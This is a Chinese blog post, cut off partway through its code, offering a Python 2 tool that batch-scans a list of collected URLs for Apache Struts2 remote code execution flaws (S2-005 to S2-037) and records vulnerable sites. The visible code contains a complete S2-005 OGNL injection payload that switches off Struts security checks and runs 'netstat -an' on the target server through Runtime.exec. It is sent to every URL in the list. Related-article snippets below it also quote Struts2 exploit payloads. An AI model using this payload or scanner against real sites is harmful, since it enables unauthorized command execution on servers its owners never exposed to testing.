【Python】STR2漏洞综合扫描+源码分析

最新推荐文章于 2023-11-24 23:44:07 发布
最新推荐文章于 2023-11-24 23:44:07 发布
阅读量2.7k 收藏 2
点赞数
分类专栏: 原创作品
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzy98/article/details/54599461
版权
本文介绍了如何使用Python进行STR2漏洞的综合扫描,并提供了详细的源码分析,帮助读者理解漏洞扫描的过程。只需准备url.txt文件,放入待检测URL,程序将自动执行并生成成功扫描结果的success.txt文件。
摘要由CSDN通过智能技术生成

花了半天写完的~~ 还不错~~


现在同目录下创建url.txt  将收集到的url放进去  就ok~~


最后成功的会在同目录下生产success.txt~~


附上源码~~~


# -*-coding:utf-8-*-
import requests
import time
print unicode('''


作者:浪子燕青


作者QQ:982722261




使用说明:
  检测以下Struts2:
       struts2_005
       struts2_009
       struts2_013
       struts2_016
       struts2_019
       struts2_032
       struts2_037
       struts2_devmode 
''','utf-8')
time.sleep(3)
zhaohan2 = open("url.txt",'r')
zhaohan3 = zhaohan2.readlines()
zhaohan2.close()
def struts2_005(urlx):  #检测的主要程序,建立检测005的函数
    zhaohan = open('success.txt','a+')
    headers = {"Content-Type": "application/x-www-form-urlencoded"}    #在下面构建exp
    exp = '''('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat -an\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))'''


    try:  #当不能连接的时候可以实现异常处理
        resp = requests.post(url=urlx, data=exp, headers=headers, timeout=10)
        if "0.0.0.0" in resp.content:   #当0.0.0.0 在返回的内容的时候说明是存在漏洞
            print unicode("发现一枚嫌疑网址,保存到本地....",'utf-8')
            zhaohan.write(urlx + "    S2_005" + "\n")
        else:
             print unicode("该网站不存在S2_005漏洞,继续扫描.....",'utf-8')    
    except:
        print unicode('连接超时&指令被禁止&或被拦截巴拉巴拉的~','utf-8')
        return None
    return None
    zhaohan.close()
    time.sleep(3)


def struts2_009(urlx):
    zhaohan = o
最低0.47元/天 解锁文章
浪子燕青啦啦啦
关注
专栏目录
Str2 漏洞 搭建 简单学习
ashen的博客
11-16 791
官方:https://cwiki.apache.org/confluence/display/WW/S2-015 1感谢大佬的项目:https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-015 1拉取景象 docker pull medicean/vulapps:s_struts2_s2-015 1运行 docker run -...
Struts2漏洞
最新发布
2403_82795493的博客
02-20 2945
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
struts2漏洞
热门推荐
qq_52527336的博客
06-30 1万+
记一下笔记一个个写吧
基于Python的网络漏洞扫描系统的设计与实现(论文+源码)_kaic
涉及毕业论文、远程调试、小程序、管理系统、JAVA、C#、IDEA、VS开发工具等
11-24 4850
国外著名半导体CPU制造商英特尔(Intel)旗下的产品在2018年被Google Project Zero团队挖掘出熔断(meltdown)漏洞、幽灵(spectre)漏洞,英特尔自己的研究团队也公布了一个基于推测执行侧信道攻击的变种漏洞,并命名为预兆(LITE,L1 terminal fault),又称 foreshadow,其中熔断漏洞几乎涉及了自1995年以来采用该相关技术的英特尔处理器,之后的幽灵漏洞的影响范围甚至是所有现代CPU,包括英特尔、AMD、ARM[5]。
Python】实现网站常见漏洞扫描+备份扫描+源码分析
夫君子之行,静以修身,俭以养德,非淡泊无以明志,非宁静无以致远.
01-13 652
config.txt是配置文件 url.txt是要扫描的url 内部配置相关的常见编辑器漏洞和svn源码泄露漏洞 多线程运行 程序的思路是先检测漏洞,在扫描备份,文件结果自动保存在当前目录 附上config.txt /a.zip /web.zip /web.rar /1.rar /bbs.rar /www.root.rar /123.rar /data.rar /bak.rar /oa...
Python】实现漏洞扫描器之MS15-034漏洞批量扫描+源码分析
浪子燕青的博客
02-14 7817
ms15-034漏洞 影响以下版本操作系统的IIS服务器 Windows 7 Windows 8 Windows server 2008 Windows server 2012 知道其严重性后,在扫描器插件加上这一模块 利用代码如下 需要导入socket模块 其中f2是打开一个文件逐行阅读 f3.write写入本地 代码我从我的扫描器测试
python漏洞扫描器代码_Python打造漏洞扫描器 3
weixin_34522296的博客
12-23 1358
基于爬虫开发XSS检测插件1、实验说明1.1 实验内容本节课会基于上节课开发的插件框架,讲解xss漏洞造成的原理,据此编写一个简单的XSS检测插件,先上效果图。javascript 1.2 实验知识点XSS基础知识XSS检测原理1.3 实验环境Python 2.7Xfce终端sublime1.4 适合人群本课程难度为通常,属于中级级别课程,适合具备Python基础的用户,熟悉python基础知识加...
Python】实现URL-sql注入检测+源码分析
浪子燕青的博客
01-25 9119
上篇博客写到了对原始URL爬行页面提取有效URL这篇继续深入,当提取到URL后开始检测是否存在注入漏洞  SQL注入检测思路:                 爬行网址,提取带有参数的url  如 http://www.target.com/show.asp?id=666 这样的url地址                 然后通过5重验证 :
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2881
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
Python实现Java代码行数读取及单元测试
07-02
运用python3实现java代码文档的行数统计,自动忽略注释与空行。另附代码的自动单元测试程序。
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 1万+
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 7426
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
struts2远程代码执行漏洞合集
黑白的博客
12-21 5320
声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响范围 Struts 2.0.0 - Struts 2.0.8 复现过程 使用vulhub cd /app/vulhub-m
Struts2远程命令执行漏洞分析及防范
dongsheng186的专栏
04-10 716
    Struts 2是在struts 和WebWork的技术基础上进行了合并的全新的框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品.   近期Stru
java 2mi远程执行漏洞_Struts2 5个远程代码执行漏洞利用POC
weixin_28822657的博客
02-27 1079
标 题: Struts2 5个远程代码执行漏洞利用POC作 者: 园长链 接: http://my.oschina.net/backtract/blog/133638利用代码: 检测是否存在:POC1:http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)((...
str2-045漏洞事件,你想要的这里都有
chengman3837的博客
03-09 218
话说昨天一觉醒来,发现整个安全圈被一个名为str2-045的漏洞霸屏了,好多小伙伴已经开始了喜刷刷的艰苦奋斗过程。然而对于很多小白童鞋来讲,他们可能还是处于懵逼的状态,别急,咱们专门为你们做了一期专题,来告诉你这到底是咋回事! 这个漏洞的全名啊,叫做:基于Jakarta插件的插件的Str...
Python】实现网站备份文件扫描+源码分析
浪子燕青的博客
02-09 2409
一开始我用的requests库的get方法 但是这种方法会自动下载文件,所以不可取 后来发现urllib2的库相对来说不错 源代码如下# coding = utf-8 import urllib2 import socket timeout=3 socket.setdefaulttimeout(timeout) headers={'User-Agent':'Mozilla/5.0 (Win
struts2漏洞批量检查
oscarli的博客
11-21 6332
检查代码来自 Lucifer。#!/usr/bin/env python # coding=utf-8 # code by Lucifer # Date 2017/10/12 import sys import base64 import warnings import requests from termcolor import cprint warnings.filterwarnings("
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浪子燕青啦啦啦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值